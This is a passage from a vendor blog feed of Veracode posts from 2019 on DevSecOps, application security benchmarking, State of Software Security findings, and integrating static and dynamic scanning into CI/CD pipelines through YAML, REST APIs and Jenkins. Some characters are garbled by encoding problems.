the security of an application???s development process (as with <a href="//">Veracode Verified</a>), rather than point-in-time third-party pen tests. Point-in-time tests will carry less and less weight as the speed of software updates and changes increase.</p> <p>What???s behind this demand for proof of security? It stems in part from new, more dire impacts from security breaches. When Target was breached in 2013, it created headlines for a few weeks, but it didn???t really affect its bottom line. Today, that has changed. Now we are seeing acquisitions fail, CEOs lose jobs, and stock values take hits because of breaches. Proving your software is secure will give companies an advantage in 2020.&nbsp;&nbsp;</p> <h4><strong>Learn more</strong></h4> <p>Continue the conversation ??? join our upcoming discussion on AppSec in 2020 in our upcoming webinar, <em><a href="">AppSec in 2020: What???s on the Horizon</a></em>.</p> Tue, 17 Dec 2019 11:45:17 -0500 (sciccone) ver45276 Making Moves: How to Successfully Transition to DevSecOps <img src="/sites/default/files/styles/resize_960/public/DevSecOps_roadmap-min.png?itok=3V4XSUIS" width="960" height="480" typeof="foaf:Image" /><p>As we look toward the future, it is becoming critical that development organizations are not only agile and flexible but ??? just as important ??? secure. In turn, security and development need to work together more closely than ever before. When security and development are in unison, organizations can produce higher quality code quicker and more securely while reducing costs and conforming to regulations. Most companies realize that DevSecOps is the true nirvana, but they are not sure how to get there.</p> <p>For starters, a successful transition to DevSecOps means that security and development teams need to reevaluate their roles. Ensuring the stability and security of software is no longer just the security team???s responsibility, it now includes developers. Developers should be testing, and security professionals should now be <em>governing</em> the testing. This culture shift can be a real challenge given that most security professionals have never worked alongside development teams and are not familiar with their processes, priorities, or tools. But once security and development teams are able to successfully work hand in hand, DevSecOps is achievable.&nbsp;&nbsp;</p> <p>With this culture shift in mind, how do we formulate an AppSec strategy that transforms DevOps into DevSecOps? In its new report, <em><a href="">Building an Enterprise DevSecOps Program</a></em>, analyst firm Securosis provides an outline of the security tools and techniques needed at each stage in the software development lifecycle:</p> <h4><strong>Define and Architect Phase</strong></h4> <p><strong>Reference security architectures:</strong> Reference security architectures ??? or service provider guidelines for cloud services ??? to understand the rules and policies that dictate how applications operate and communicate. Once you are familiar with the security architecture, you should work with development to come up with operational standards. Some important operational standards to consider include minimal testing security requirements, time frames for fixing issues, and when to break a build.&nbsp;&nbsp;</p> <p><strong>Security requirements:</strong> Decide which security tests should be run prior to deployment. Are you going to test for OWASP Top Ten vulnerabilities?</p> <p><strong>Monitoring and metrics:</strong> Consider what metrics you need to improve releases or problematic code or to determine what is working well. You should also think about what data you want to collect and build it into your CI/CD and production environments to measure how your scripts and tests perform.</p> <h4><strong>Design Phase</strong></h4> <p><strong>Security design principles:</strong> Follow security design and operational principles because they offer valuable security improvement recommendations. Following these principles can be time consuming, but IT and development typically help because it benefits them as well.</p> <p><strong>Secure the deployment pipeline:</strong> Ensure that development and test environments are secure. Set up strict access controls for CI/CD pipelines and additional monitoring for scripts running continuously in the background.</p> <p><strong>Threat modeling:</strong> Teach the development team about common threat types and help them plan out tests to address attacks. If your security team is not able to address threat monitoring internally, you can consider hiring a consultant.</p> <h4><strong>Develop Phase</strong></h4> <p><strong>Automate:</strong> Automating security testing at this phase is key.</p> <p><strong>Secure code repositories:</strong> Make it easy for developers to get secure and internally approved open source libraries. How? Consider keeping local copies of approved, easy-to-access libraries, and use a combination of composition analysis tools and scripts to make sure developers are using the approved versions.</p> <p><strong>Security in the scrum:</strong> Set up your "security champions" program, training selected members of the development teams in security basics, to help with these security tasks.</p> <p><strong>Test-driven development:</strong> Consider incorporating security into test-driven development, where tests are constructed along with code.&nbsp;&nbsp;</p> <p><strong>Interactive Application Security Testing (IAST):</strong> Analyze your application???s code using IAST. The IAST scanner aims to find security vulnerabilities <em>before </em>you launch code into production.</p> <h4><strong>Test Phase</strong></h4> <p><strong>Design for failure:</strong> The thought process behind this concept is, if there is a flaw with your application, it is better that <em>you</em> break it than an attacker.</p> <p><strong>Parallelize security testing: </strong>Address security tests that are slowing down your deployments by running multiple tests in parallel. Reconfiguring test environments for efficiency helps with Continuous Integration.</p> <h4><strong>Pre-Release Phase</strong></h4> <p><strong>Elasticity:</strong> Make sure your security testing leverages on-demand elastic cloud services to speed up security testing.</p> <p><strong>Test data management:</strong> Prevent unnecessary data breaches by locking down production environments so quality assurance and development personnel cannot ex?ャ?ltrate regulated data or bypass your security controls. Consider using tools like data masking or tokenization, which deliver test data derived from production data but without the sensitive information.</p> <h4><strong>Deploy Phase</strong></h4> <p><strong>Manual vs. automated deployment:</strong> Use automation whenever possible. It is okay to use some manual processes, but it is important to remember that the more you automate, the more capacity the team will have to test and monitor.&nbsp;</p> <p><strong>Deployment and rollback:</strong> Start by using smoke tests to make sure that the test code that worked in pre-deployment still works in deployment. Then, if you need to augment deployment, use one of these three tricks. The first is Blue-Green or Red-Black deployment. This is where old and new code run simultaneously on their own set of servers. The rollout is simple and, if errors are uncovered, the load balancers are pointed back to the older code. The second is canary testing. In canary testing, a small subset of individual sessions is directed toward the new code. If erors are encountered and the canary dies, the new code is retired until the issue is fixed. Lastly, feature tagging enables and disables new code elements. If event errors are found in a new section of code, you can toggle off the feature until it is fixed.</p> <p><strong>Production security tests:</strong> Note that it is common for applications to continue to function even when security controls fail. Consider employing penetration testers to examine the application at runtime for ?ャ?aws.</p> <h4><strong>Learn More</strong></h4> <p>By embracing the role changes brought about by DevOps and working with developers to add security tools and techniques into the software delivery lifecycle, you can successfully transition to DevSecOps.</p> <p>Get more detailed information on building out a DevSecOps program in the Securosis report, <em><a href="">Building an Enterprise DevSecOps Program</a></em>.</p> Mon, 16 Dec 2019 13:14:08 -0500 (hgoslin) ver45181 Optiv Announces New Software Assurance as-a-Service Offering Powered by Veracode <img src="/sites/default/files/styles/resize_960/public/new_optiv_security_offering-min.png?itok=lfD9B6s1" width="960" height="480" typeof="foaf:Image" /><p>In an effort to help drive collaboration between security, development, and operations, improve speed to market, and ensure software is secure from the start, Optiv has released its new <a href="">Software Assurance as-a-Service (SAaaS)</a> offering. This program pairs Optiv???s consulting and security services with Veracode???s cloud-based, end-to-end <a href="//">application security solutions</a> to give companies a programmatic approach to DevSecOps.</p> <p>In today???s world, every company is a <a href="//">software company</a> and, as a result, one of the top attack vectors for software-driven and supported organizations is the application. Just as development teams are increasingly integrating automated security into their workflows, security teams are looking for support to plan, build, and run strong application security programs that deliver on the overarching goals of the business.</p> <p>Through SAaaS, DevSecOps teams are assisted with detection, analysis, and response to application vulnerabilities with <a href="//">Veracode Static Analysis</a>, <a href="//">Veracode Dynamic Analysis</a>, and <a href="//">Veracode Software Composition Analysis</a>. In order to ensure that the flaws aren???t just found, but also fixed, the Optiv SAaaS solution is inclusive of software assurance expertise for code review, threat modeling, SDLC workshops, architectural review, and program development.</p> <p>Optiv SAaaS enables modern organizations of all sizes and maturity levels to take advantage of a highly scalable platform and seamless integration to build a customized AppSec program that delivers secure software faster. This offering can help companies empower their development and security teams, lower their security risk, and turn security into a competitive advantage.</p> <p>Learn more <a href="">here</a>.</p> Mon, 09 Dec 2019 10:02:22 -0500 (lbois) ver45086 DevSecOps Challenges From a Security Perspective <img src="/sites/default/files/styles/resize_960/public/new_understanding_btwn_dev_and_sec-min.png?itok=RWT9xo_1" width="960" height="480" typeof="foaf:Image" /><p>The transition from DevOps to DevSecOps requires security professionals to have a whole new understanding of development processes, priorities, tools, and painpoints. It???s no longer feasible for security professionals to get by with a superficial understanding of how developers work. But this understanding can be a significant undertaking for most security pros who haven???t had to be immersed in the development side of the house previously.</p> <p>In its new report, <em><a href="">Building an Enterprise DevSecOps Program</a></em>, analyst firm Securosis notes of security teams and DevSecOps, ???Their challenge is to understand what development is trying to accomplish, integrate with them in some fashion, and ?ャ?gure out how to leverage automated security testing to be at least as agile as development.???</p> <p>In this same paper, Securosis highlights the questions security professionals ask them most often surrounding DevSecOps, which include ???can we realistically modify developer behavior???? ???What tools do we start with to ???shift left?????? and ???how do we integrate security testing into the development pipeline???? These are all valid and important questions, but Securosis points out that there are also questions security teams should be asking, but aren???t, including:</p> <ul> <li>How do we ?ャ?t ??? operationally and culturally ??? into DevSecOps?</li> <li>How do we get visibility into Development and their practices?</li> <li>How do we know changes are effective? What metrics should we collect and monitor?</li> <li>How do we support Development?</li> <li>Do we need to know how to code?</li> </ul> <p>The questions the security team is currently asking are about security tasks in DevSecOps; the questions they aren???t asking are about how to understand and work with the development organization. And those are the questions they should start asking. Where to start? The key development areas security teams need to understand when trying to get a handle on application security include the following:</p> <p><strong>Process</strong>: At the very least understand why development processes have changed over the years, what they are trying to achieve, and make sure security testing embraces the same ideals.</p> <p><strong>Developer tools</strong>: You need to understand the tools developers use to manage the code they are building in order to understand where code can be inspected for security issues.</p> <p><strong>Code</strong>: Security tests are shifting left and looking at code, not fully developed applications. The traditional thinking about security audits needs to shift as well.</p> <p><strong>Open source</strong>: You would be hard-pressed to find an app that isn???t made up primarily of open source code. Understand why, and then work with the development team to help them continue to use open source code, but in a secure way.</p> <p><strong>How security tools affect developer processes</strong>: Make sure the security tools you select integrate with the tools and processes developers already use and don???t slow them down with false positives.</p> <p><strong>Cultural dynamics</strong>: You need to fully understand the development team???s goals and priorities ??? which are most often centered around speed. That understanding is key to getting developer buy-in and acceptance.</p> <p><strong>SDLC</strong>: It???s best practice to include some kind of security analysis in each phase of the software lifecycle. For instance, threat modeling during design, and software composition analysis during development. In this way, you establish a process-independent AppSec program that will work with varying development processes.</p> <p>For more details on these development areas and practical advice on building an effective DevSecOps program, check out the <a href="">full Securosis report</a>.</p> Fri, 06 Dec 2019 10:19:36 -0500 (sciccone) ver45061 [VIDEO] How Veracode Leverages AWS to Eliminate AppSec Flaws at Scale <img src="/sites/default/files/styles/resize_960/public/securing_code_at_scale-min.png?itok=IxSx4UN1" width="960" height="480" typeof="foaf:Image" /><p>Veracode???s SaaS-native platform has scanned more than 10 trillion lines of code for security defects ??? that breaks down to more than 4 million applications, with 1 million of those scanned in the last year alone. By scanning in the Veracode platform, our customers benefit from the convenience of running programs, not systems, and developers free up much-needed processing power so they can continue writing code without any obstacles.</p> <p>To deliver application security solutions with speed and accuracy at scale, Veracode needs massive computing power. Follow along as Veracode???s EMEA CTO, Paul Farrington, explains how the Veracode platform leverages Amazon Web Services to solve some of the hardest problems facing organizations today ??? securing software in an ever-changing digital landscape.</p> <p>&nbsp;</p> <p><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="" width="560"></iframe></p> Tue, 26 Nov 2019 09:39:41 -0500 (lpaine) ver44721 Using Benchmarks to Make the Case for AppSec <img src="/sites/default/files/styles/resize_960/public/AppSec_benchmark_data-min.png?itok=uo90IXBO" width="960" height="480" typeof="foaf:Image" /><p>In a recent Veracode <a href="">webinar</a> on the subject of making the business case for AppSec, Colin Domoney, DevSecOps consultant, introduced the idea of using benchmarking to rally the troops around your AppSec cause. He says, ???What you can do is you can show where your organization sits relative to other organizations and then your peers. If you're lagging, that's probably a good reason to further invest. If you're leading, perhaps you can use that opportunity to catch up on some of your more ambitious projects. We use benchmarking quite frequently. It's quite a useful task to undertake.???</p> <p>Ultimately, the value of benchmarks is two-fold; you can see, as Colin says, ???where you???re lagging??? and use that data to make the case for more budget. But it also strengthens your ask by giving it priorities and a clear road map. For instance, you could say, ???we need more AppSec budget,??? but your argument is more powerful if you can say, ???OWASP???s maturity model recommends automating security testing,??? or ???most organizations in the retail industry are testing for security monthly.???</p> <p>If you???re looking for some AppSec benchmarking data, we recommend considering the following:</p> <p><strong>OWASP???s OpenSAMM Maturity Model</strong>: <a href="">OWASP???s Software Assurance Maturity Model (SAMM)</a> is ???an open framework to help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization. The resources provided by SAMM will aid in:</p> <ul> <li>Evaluating an organization???s existing software security practices.</li> <li>Building a balanced software security assurance program in well-defined iterations.</li> <li>Demonstrating concrete improvements to a security assurance program.</li> <li>Defining and measuring security-related activities throughout an organization.???</li> </ul> <p>At the highest level, SAMM defines four critical business functions related to software development. Within each business function are three security practices, and within each practice there are three levels of maturity, each with related activities. For instance, under the Business Function ???Verification,??? there is a security practice called ???Implementation review,??? which has the following maturity levels:</p> <ul> <li>Level one: &nbsp;???Opportunistically finding basic code-level vulnerabilities and other high-risk security issues.???</li> <li>Level two: ???Make implementation review during development more accurate and efficient through automation.???</li> <li>Level three: ???Mandate comprehensive implementation review process to discover language-level and application-specific risks.???</li> </ul> <p>The model also goes into detail on each of the security activities, the success metrics, and more. There is also a related ???How-To Guide??? and ???Quick Start Guide.???</p> <p><strong>Veracode???s Verified Program</strong>: We created <a href="//">Verified</a> to both give customers a way to prove to their customers that security is a priority, but also to give customers a road map toward application security maturity, based on our own 10+ years experience of what good AppSec looks like. Want to see how you stack up against a mature program? Take a look at the requirements for the highest Verified tier ??? Verified Continuous level. If your program looks more like the Standard or Team levels, use that to make the case to grow your program with a clear roadmap of what is entailed in taking your program to the next level.</p> <p><strong>Veracode <em>State of Software Security</em></strong> <strong>(SOSS)</strong> <strong>report</strong>: Our annual report offers some valuable benchmarking data for your AppSec program. Because we are a SaaS platform, we are able to aggregate all our scan data and look at trends across industries, geographies, and development processes.</p> <p>You can use the <a href="//">SOSS report</a> to benchmark your program against all organizations, those in your industry, or against those that are implementing practices that are improving the state of their software security. For instance, this year???s report found that 80 percent of applications don???t contain any high-severity flaws ??? how do you measure up? In addition, we found that those who are scanning the most (260+ times per year) have 5x less security debt and improve their median time to remediation by 72 percent. How often are you scanning?</p> <p>You can also use the SOSS report to measure your program and progress against your peers in your industry. For example, this year, we found that most of the top 10 flaw categories show a lower prevalence among retailers compared to the cross-industry average. The exceptions to that rule are Credentials Management and, to a lesser extent, Code Injection. It???s possible these tie back to core functionality in retail applications ??? authenticating users and handling user input. If you???re in the retail industry, you???ve now got a solid starting point for vulnerability types to focus on. If you???re in the Government and Education sector, your peers are struggling with Cross-Site Scripting flaws, are you? And finally, those in the financial sector, have the best fix rate among all industries at 76 percent ??? does your fix rate compare favorably?</p> <h4><strong>Learn more</strong></h4> <p>To find out more about making the case for AppSec, check out our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.</p> Fri, 15 Nov 2019 09:50:25 -0500 (sciccone) ver44371 How to Leverage YAML to Integrate Veracode Solutions Into CI/CD Pipelines <img src="/sites/default/files/styles/resize_960/public/integrating_Veracode_development_pipeline-min.png?itok=SZlRfMS9" width="960" height="480" typeof="foaf:Image" /><p>YAML scripting is frequently used to simplify configuration management of CI/CD tools. This blog post shows how YAML scripts for build tools like Circle CI, Concourse CI, GitLab, and Travis can be edited in order to create integrations with the Veracode Platform. Integrating Veracode AppSec solutions into CI/CD pipelines enables developers to embed remediation of software vulnerabilities directly into their SDLC workflows, creating a more efficient process for building secure applications. You can also extend the script template proposed in this blog to integrate Veracode AppSec scanning with almost any YAML-configured build tool. &nbsp;</p> <h4><strong>Step One: Environment Requirements</strong></h4> <p>The first step is to confirm that your selected CI tool supports YAML-based pipeline definitions, where we assume that you are spinning up Docker images to run your CI/CD workflows. Your Docker images can run either on Java or .Net. Scripts included in this article are targeted only for Java, and you will need to confirm this step before moving on to the next one.</p> <h4><strong>Step Two: Setting Up Your YAML File</strong></h4> <p>The second step is to locate the YAML configuration file, which for many CI tools is labeled as config.yml. The basic syntax is the same for most build tools, with some minor variations. The links below contain configuration file scripts for Circle CI, Concourse CI, GitLab, and Travis, which you can also use as examples for adjusting methods of config files for other build tools.</p> <ul> <li><a href="" style="font-size: 13.008px;">CircleCI</a></li> <li><a href="" style="font-size: 13.008px;">ConcourseCI</a></li> <li><a href="" style="font-size: 13.008px;">GitLab</a></li> <li><a href="" style="font-size: 13.008px;">Travis</a></li> </ul> <h4><strong>Step Three: Downloading the Java API Wrapper</strong></h4> <p>The next step requires downloading the Java API wrapper, which can be done by using the script below.</p> <pre class="language-yml"><code> # grab the Veracode agent run: name: "Get the Veracode agent" command: | wget <a href=""></a> -O VeracodeJavaAPI.jar </code></pre><h4><strong>Step Four: Adding Veracode Scan Attributes to Build Pipelines</strong></h4> <p>The final step requires entering in the script all the information required to interact with Veracode APIs, including data attributes like users??? access credentials, application name, build tool version number, etc. Veracode has created a rich library of APIs that provide numerous options for interacting with the Veracode Platform, and that enable customers and partners to create their own integrations. Information on Veracode APIs is available in the <a href="">Veracode Help Center</a>.</p> <p>The script listed below demonstrates how to add attributes to the Circle CI YAML configuration file, so that the script can run the uploadandscan API, which will enable application uploading from Circle CI to the Veracode Platform, and trigger the Platform to run the application scan.</p> <pre class="language-yml"><code>run: name: "Upload to Veracode" command: java -jar VeracodeJavaAPI.jar -vid $VERACODE_API_ID -vkey $VERACODE_API_KEY -action uploadandscan -appname $VERACODE_APP_NAME -createprofile false -version CircleCI-$CIRCLE_BUILD_NUM -filepath </code></pre><p>In this example, we have defined:</p> <p>Name ??? YAML workflow name defined in this script</p> <p>Command ??? command to run Veracode API. Details on downloading API jar are already provided in the previous step</p> <p>-vid $VERACODE_API_ID - user???s Veracode ID access credential</p> <p>--vkey $VERACODE_API_KEY ??? user???s Veracode Key access credential</p> <p>-action uploadandscan ??? name of Veracode API invoked by this script</p> <p>$VERACODE_APP_NAME ??? name of customer application targeted for uploading and scanning by the Platform. This application name should be defined identically to the way that it is defined in the application profile on the Veracode Platform</p> <p>-createprofile false ??? is a Boolean that defines whether application profile should be automatically created if the veracode_app_name does not find a match for an existing application profile. &nbsp;</p> <ul> <li>If defined as true, application profile will be created automatically if no app_name match is found, and upload and scan steps will continue</li> <li>If defined as false, application profile will not be created, with no further actions for upload and scan</li> </ul> <p>-version CircleCI - $CIRCLE_BUILD_NUM ??? version number of the Circle CI tool that the customer is using to run this integration</p> <p>-filepath ??? location where the application file resides prior to interacting with the Veracode API</p> <p>With these four steps, Veracode scanning is now integrated into a new CI/CD pipeline.</p> <p>Integrating application security scanning directly into your build tools enables developers to incorporate security scans directly into their SDLC cycles. Finding software vulnerabilities earlier in the development cycle allows for simpler remediation and more efficient issue resolution, enabling Veracode customers to build more secure software, without compromising on development deadlines.</p> <p>For additional information on Veracode Integrations, please visit our <a href="//">integrations page</a>.</p> Thu, 14 Nov 2019 09:59:48 -0500 (krise) ver44361 State of Software Security v10: Top 5 Takeaways for Security Professionals <img src="/sites/default/files/styles/resize_960/public/shutterstock_213363751-min.png?itok=KBrIaA6R" width="960" height="480" typeof="foaf:Image" /><p>It???s the 10<sup>th</sup> anniversary of our <a href="//"><em>State of Software Security</em> (SOSS) report</a>! This year, like every year, we dug into our data from a recent 12-month period (this year we analyzed 85,000 applications, 1.4 million scans, and nearly 10 million security findings), but we also took a look back at 10 years of software security. With a decade???s worth of analysis about software vulnerabilities and the best ways to address them, we???re in a unique position to offer insights into creating secure code. There???s a lot to unpack in our most recent SOSS, including some then vs. now comparisons, a look at the most popular vulnerabilities, and a deep dive into security debt. Here are the five takeaways we consider most noteworthy for security professionals:</p> <h4><strong>Apps are insecure</strong></h4> <p>Eighty-three percent of applications have at least one flaw in their initial scan. And we???ve been hovering around that number for the past decade. In addition, the types of flaws that were plaguing code a decade ago are still wreaking havoc today. The top two flaw types seen in code 10 years ago are the same top two we saw this past year: information leakage and cryptographic issues. And many of the top 10 flaws in Volume 1 remain on the top 10 list today, including CRLF injection, Cross-Site Scripting, SQL Injection, and Credentials Management.</p> <p>What is going on here? We???ve said it before, and we???ll say it again: we need to do a better job helping developers create secure code. We recently partnered with to conduct a survey surrounding <a href="">DevSecOps skills</a> and found that less than one in four developers or other IT pros were required to take a single college course on security. Meantime, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security.</p> <h4><strong>Security debt is a significant problem</strong></h4> <p>In the good news department, we do see improvement in fix rates. For example, half of applications showed a net reduction in flaws over the sample time frame. Another 20 percent either had no flaws or showed no change. This means 70 percent of development teams are keeping pace or pulling ahead in the flaw-busting race! However, we also found that teams are prioritizing newly found security flaws over older flaws, leading to security debt piling up. This year???s data reveals that flaws are much more likely to be fixed soon after they???re discovered.</p> <h4><strong>We???re doing a better job tackling high-severity flaws, but not the most exploitable ones</strong></h4> <p>As we said above, developers are doing a better job fixing what they find, and they are prioritizing both the most recently discovered, and the most severe. On the one hand, this is good news. On the other, we found the security debt that has accumulated across organizations is comprised primarily of Cross-Site Scripting, with Injection, Authentication, and Misconfiguration flaws making up sizable portions as well. This is noteworthy because Injection is the second most prevalent flaw category in reported exploits. Bottom line: Exploitability of a flaw needs to be prioritized, and older flaws need to be addressed. An older injection flaw is just as dangerous as a newly discovered one.</p> <h4><strong>When you scan more, you secure more </strong></h4> <p>This year???s report also looked at the effect of both scanning cadence and frequency on security debt and fix rate. And the results were striking. Those that scanned the most, and the most regularly, had dramatically better fix rates and less security debt. In fact, those with the highest scan frequency (260+ scans per year) had 5x less security debt, and a 72 percent reduction in median time to remediation.</p> <h4><strong>There are some differences in how organizations in different industries are securing software</strong></h4> <p>Looking at the software security trends in your own industry gives you an idea of how your program compares, and where to focus your security efforts.</p> <p>And we did find some significant differences this year in how different industries are tackling AppSec. For instance, we found that organizations in the retail sector are doing the best job at keeping security debt at bay, while those in the government and education space are doing the worst.</p> <p>The infrastructure industry is fixing flaws almost 4X faster than any other industry, and 13X faster than the median time to remediation for healthcare. The financial industry has an impressive fix rate, but one of the slowest median times to remediation.</p> <p>You???ll find all the SOSS X industry infosheets, which include details on which vulnerabilities are most common in each industry, on our <a href="//">Resources</a> page.</p> <h4><strong>Read the report</strong></h4> <p>Read the full SOSS report to learn more about best practices that can help keep your software security. Check out our <a href="//">SOSS X page</a> for access to the full report, additional data highlights, videos of Veracode experts discussing the results, and more.</p> Tue, 12 Nov 2019 12:35:01 -0500 (sciccone) ver44271 Automate Dynamic Analysis Scans With New REST APIs <img src="/sites/default/files/styles/resize_960/public/integrating_DAST_withRESTAPI-min%20%281%29.png?itok=w1T20CPu" width="960" height="480" typeof="foaf:Image" /><p>In today???s fast-paced, technology-driven world, security breaches have become an increasingly important priority for organizations; however, ensuring that your organization remains as secure as possible can be like trying to hit a moving target. One of the most common attack vectors that results in a breach is insecure web applications. Dynamic Application Security Testing (DAST) is one of the best ways to identify and remediate exploitable vulnerabilities in your web applications and reduce your risk of a breach.</p> <p>With a shift towards DevOps and more rapid releases, the easiest way to accomplish DAST scanning is through automation. This allows developers and security teams to automatically kick off DAST scans directly from the tools they already use. The Veracode Dynamic Analysis REST APIs enable our customers to automate the core functionality of the solution within their chosen development and security processes. Specifically, the REST APIs enable development teams to build their own integrations to create, configure, schedule, run, and link their results back to the application profile, which can aggregate their scan results across multiple assessment types. This means that development teams can kick off and return DAST scan results without ever needing to leave their unique workflows and development environments. The REST APIs coupled with faster scan times even allow customers to integrate DAST scanning as a non-release blocking post-build action as a part of their CI/CD.</p> <p>Veracode???s <a href="">YAML</a> and <a href="">Swagger</a> files leverage these APIs to make it easy to integrate Veracode Dynamic Analysis into your SDLC, ensuring that they can be broadly leveraged regardless of the development tool. For further information on the Veracode APIs, visit the <a href="">Veracode Help Center</a>.</p> <h4>How to automate dynamic application scanning</h4> <p>DAST scans take longer to return scan results than static analysis testing because they need to crawl and attack the live application the way an attacker would without bringing down the application. Due to this crawl-and-audit scanning process, DAST solutions can seem less DevOps friendly than other assessment types. This can result in push back from development teams when they are asked to include DAST scanning every time the pipeline runs.</p> <p>The Veracode Dynamic Analysis REST APIs help address some of this push back. Now, instead of needing to take a separate step to initiate a DAST scan, development teams can integrate Veracode Dynamic Analysis into their SDLC or parallel security process and automatically kick off scans.</p> <p>There are several approaches you can take to automate DAST scanning with the Veracode Dynamic Analysis APIs:</p> <p><strong>100% API Driven</strong>: This is a very flexible approach made for teams that have a high level of comfort with writing custom scripts and using APIs for automation. This approach allows customers to use Swagger documentation, JSON templates, and possibly sequential API calls to drive intended code, configuration, and scan reuse behavior.</p> <p><strong>UI Configured, API Scheduled</strong>: This hybrid model allows customers to configure their scans within the Veracode Dynamic Analysis UI and then leverage that configuration when setting up automation through the APIs. This enables customers to validate their configuration with prescan prior to integrating with the APIs and allows for more trial and error.</p> <p><span>Below is an example of a recurring scan that starts every Friday, and the schedule expires after two instances.</span></p> <p> <div class="media media-element-container media-default"> <div id="file-24376" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="610" width="1048"> </div> </div> </div></p> <p>Below is an example of a scan with Pause and Resume for black out period between 9-11pm.</p> <p> <div class="media media-element-container media-default"> <div id="file-24381" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="651" width="965"> </div> </div> </div></p> <p>Below is an example of how to set up Auto Login for authenticated scans.</p> <p> <div class="media media-element-container media-default"> <div id="file-24386" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="857" width="1220"> </div> </div> </div></p> <h4><strong>Scan applications on private networks with Internal Scanning Management (ISM)</strong></h4> <p><span>It???s best practice to carry out dynamic analysis scans before an application is released to production and then regularly when it???s in production to ensure that there are no new exploitable vulnerabilities in the application. The first round of scanning therefore must take place either during the test or QA phases of deployment, but often these environments are not reachable from the Internet as they are behind the firewall. The only way to automate DAST scanning in the CI/CD is to conduct a behind-the-firewall scan. Additionally, some applications, such as those that are used for financial operations and HR purposes or applications that contain sensitive, highly regulated data, always live behind a firewall as an added layer of security. Unfortunately, if the firewall is compromised, these applications can still be at risk of a breach if not regularly scanned.</span></p> <p>Veracode Dynamic Analysis leverages Internal Scanning Management (ISM) to access applications behind the firewall. ISM establishes a secure connection to Veracode???s cloud and the network segment that hosts the target application. Unlike on-premise scanning appliances that typically have a one-to-one relationship between appliance and application, Veracode Internal Scanning Management allows organizations to scan multiple internal applications through a single endpoint. Additionally, this model does not require operational maintenance because all scan engine updates are carried out within the Veracode Platform. The Veracode Dynamic Analysis REST APIs allow for customers to automate internal scanning. Once a customer has set up ISM within the Veracode Dynamic Analysis UI, APIs can leverage the gateway and endpoint IDs to automatically kick off DAST scans on applications that live behind the firewall.</p> <h4><strong>Why DAST: find exploitable vulnerabilities other assessment types overlook</strong></h4> <p>When you go to your doctor for an annual checkup, she conducts several tests on you. Taking your temperature won???t surface issues with your liver, and a blood test won???t find a broken bone. Similarly, a comprehensive application security program needs several assessment types for due diligence of high-risk applications.</p> <p>Dynamic analysis instruments a browser to actively attack the running application. As such, the vulnerabilities it finds are provably exploitable and not merely theoretical based on analyzing the source code, which reduces false positives. Dynamic analysis is also the only assessment type that can find security misconfigurations on the server because it assesses the running instance rather than the code. In a nutshell, one assessment type only gives you a partial understanding of your application risk; the only way to ensure that you have broad security coverage of your applications is to scan with multiple assessment types across your software development lifecycle.</p> <p>Regardless of which combination of scanning technologies your team leverages, automating scanning ensures broader adoption of security testing among development and security teams. Veracode Dynamic Analysis??? REST APIs provide added flexibility for organizations to include DAST scanning in development and existing security processes by reducing the time teams must spend uploading, configuring, scheduling, and kicking off scans, ultimately helping our customers reduce their overall risk of a breach. For more information, please visit the <a href="">Veracode Help Center</a> or the <a href="">Veracode Community</a>.</p> Thu, 31 Oct 2019 12:21:04 -0400 (bsarathy) ver44211 Veracode Dynamic Analysis + Jenkins: Integrate DAST Into Your CI/CD Pipeline <img src="/sites/default/files/styles/resize_960/public/DAST_Jenkins_integration-min.png?itok=Rxucn3Ie" width="960" height="480" typeof="foaf:Image" /><p>It???s the age-old dilemma ??? balancing the need to ensure applications are secure with the need to release applications and updates on faster and faster schedules. With many teams adopting the principles of DevSecOps, and implementing security checks as early as possible in the SDLC, a key aspect of success is integrating security with the tools that development teams already use.</p> <p>The Veracode Dynamic Analysis + Jenkins integration allows you to automate DAST scanning by creating post-build resubmit and review actions through the freestyle build or resubmit and review steps as part of the pipeline build.</p> <h4><strong>Why integrate DAST scanning into your CI/CD?</strong></h4> <p>To get the most comprehensive understanding of your risk, it???s best practice to implement multiple assessment types throughout the SDLC. In this way, you not only identify flaws in code, but also find exploitable vulnerabilities that have made it into production that could leave your organization open to a breach. One way to get a complete view into these exploitable vulnerabilities is to perform regular Dynamic Application Security Testing (DAST) scans on your web applications. DAST scanning can take place as early as test or QA but often is performed on runtime web applications to monitor the application for vulnerabilities that may not have been caught by earlier forms of testing.</p> <p>In the past, DAST scanning was viewed as a slower assessment type and incompatible with more rapid development processes like CI/CD; however, thanks to a newly released integration between Veracode Dynamic Analysis and Jenkins, development teams can perform these critical checks as a part of their regular release cadence. This integration will leverage the tools and processes that development teams are already using and will make ensuring developer adoption a much easier task for the security team.</p> <h4><strong>Creating post-build actions with freestyle or pipeline builds</strong></h4> <p>Veracode knows that development teams use Jenkins differently, and that is why we have built in flexibility in how this integration can be used. With the freestyle builds, you can leverage Global Veracode API account credentials to set up resubmit and review actions.</p> <p><strong><em>Resubmitting Veracode Dynamic Analysis scans in Jenkins</em></strong></p> <p>Resubmitting your DAST scan will ensure that you are able to see the most up-to-date vulnerability data for your web application. With rapidly changing applications and an ever-evolving threat landscape, an application that was secure during one release pipeline may no longer be secure for the next. The ability to resubmit scans ensures that your teams are checking for exploitable vulnerabilities and remediating the ones that are found right from their Jenkins instance. You can configure each resubmit action for specific analyses as well as for scan duration, which will help your teams fit DAST scanning into their release pipelines.</p> <p><strong><em>Reviewing Veracode Dynamic Analysis results in Jenkins</em></strong></p> <p>Once your teams have run Veracode Dynamic Analysis, it is easier for them to review their results from within Jenkins instead of in the Veracode Application Security Platform. This integration allows you to review the DAST results of any linked application right in Jenkins and see whether your application meets or fails policy.</p> <p><strong><em>Failing the Build</em></strong></p> <p>It is important to note that development teams can automatically fail the build and stop the application from releasing if the application does not meet security policy. With the Veracode Dynamic Analysis + Jenkins integration, development teams can fail the build if:</p> <ul> <li>A scan takes too long as part of the resubmit action</li> <li>Results don???t return within a certain timeframe as part of the review action</li> <li>The results fail policy as part of the review action</li> </ul> <p>This ensures that your teams are unable to release insecure applications prior to a full security audit and will greatly reduce 